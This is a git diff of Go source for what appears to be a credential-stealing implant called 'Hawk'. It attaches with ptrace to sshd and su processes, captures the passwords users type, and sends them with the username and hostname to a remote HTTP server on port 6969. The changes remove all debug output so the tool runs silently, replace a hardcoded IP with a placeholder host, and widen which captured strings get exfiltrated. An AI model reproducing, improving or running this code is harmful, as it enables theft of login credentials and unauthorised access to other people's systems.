diff --git a/main.go b/main.go index f11c7dd..2d74e2b 100644 --- a/main.go +++ b/main.go @@ -52,7 +52,7 @@ func exfil_password(username, password string) { if err != nil { return } - serverURL := "http://10.159.76.35:6969/" + serverURL := "http://fill:6969/" values := url.Values{} values.Set("hostname", hostname) values.Set("username", username) @@ -75,7 +75,6 @@ func main() { if !processedFirstPID { processedFirstPID = true } else { - fmt.Println("SSHD process found with PID:", pid) go traceSSHDProcess(pid) processed_pids = append(processed_pids, pid) } @@ -84,7 +83,6 @@ func main() { if !processedFirstPID { processedFirstPID = true } else { - fmt.Println("SU process found with PID:", pid) go traceSUProcess(pid) processed_pids = append(processed_pids, pid) } diff --git a/ssh_tracer.go b/ssh_tracer.go index 59ce0c5..1355ef5 100644 --- a/ssh_tracer.go +++ b/ssh_tracer.go @@ -5,18 +5,16 @@ import ( "io/ioutil" "regexp" "syscall" + "unicode" ) func traceSSHDProcess(pid int) { - fmt.Printf("[Hawk] SSH Connection Identified on pid: %d.\n", pid) - err := syscall.PtraceAttach(pid) if err != nil { return } defer func() { syscall.PtraceDetach(pid) - fmt.Printf("[Hawk] Detached from pid: %d.\n", pid) }() var wstatus syscall.WaitStatus @@ -35,7 +33,6 @@ func traceSSHDProcess(pid int) { var regs syscall.PtraceRegs err := syscall.PtraceGetRegs(pid, ®s) if err != nil { - fmt.Println("PtraceGetRegs:", err) syscall.PtraceDetach(pid) return } @@ -53,14 +50,10 @@ func traceSSHDProcess(pid int) { if len(matches) == 2 { username = string(matches[1]) } - var password = string(buffer) - valid := regexp.MustCompile(`\x00\x00\x00[^\n]*\f$`).MatchString(password) - if !valid { - fmt.Printf("Username: %q, Password %q\n", username, password) - go exfil_password(username, removeFirstFourBytes(password)) + var password = removeNonPrintableAscii(string(buffer)) + if len(password) > 2 && len(password) < 250 { + go exfil_password(username, removeNonPrintableAscii(password)) } - } else { - fmt.Printf("rdi: %d, rax: %d\n", regs.Rdi, regs.Orig_rax) } } } @@ -72,9 +65,14 @@ func traceSSHDProcess(pid int) { } } -func removeFirstFourBytes(input string) string { - if len(input) < 4 { - return "" +func removeNonPrintableAscii(input string) string { + var resultBuilder []rune + + for _, char := range input { + if unicode.IsPrint(char) && char >= 32 && char != 127 { + resultBuilder = append(resultBuilder, char) + } } - return input[4:] + + return string(resultBuilder) } diff --git a/su_tracer.go b/su_tracer.go index baf8fc9..65f8ebc 100644 --- a/su_tracer.go +++ b/su_tracer.go @@ -9,13 +9,11 @@ import ( ) func traceSUProcess(pid int) { - fmt.Printf("[Hawk] SU Connection Identified on pid: %d.\n", pid) err := syscall.PtraceAttach(pid) if err != nil { return } defer func() { - fmt.Printf("[Hawk] Detached from pid: %d.\n", pid) syscall.PtraceDetach(pid) }() var wstatus syscall.WaitStatus @@ -34,11 +32,10 @@ func traceSUProcess(pid int) { var regs syscall.PtraceRegs ptrace_err := syscall.PtraceGetRegs(pid, ®s) if ptrace_err != nil { - fmt.Println("PtraceGetRegs:", ptrace_err) syscall.PtraceDetach(pid) return } - if regs.Orig_rax == 0 && regs.Rdx == 511 && regs.Rdi == 0 { + if regs.Orig_rax == 0 && regs.Rdi == 0 { readSyscallCount++ if readSyscallCount == 3 { buffer := make([]byte, regs.Rdx) @@ -64,14 +61,11 @@ func traceSUProcess(pid int) { } return true }(password) { - fmt.Printf("Username: %q, Password %q\n", username, password) go exfil_password(username, password) } } } - } - err = syscall.PtraceSyscall(pid, 0) if err != nil { return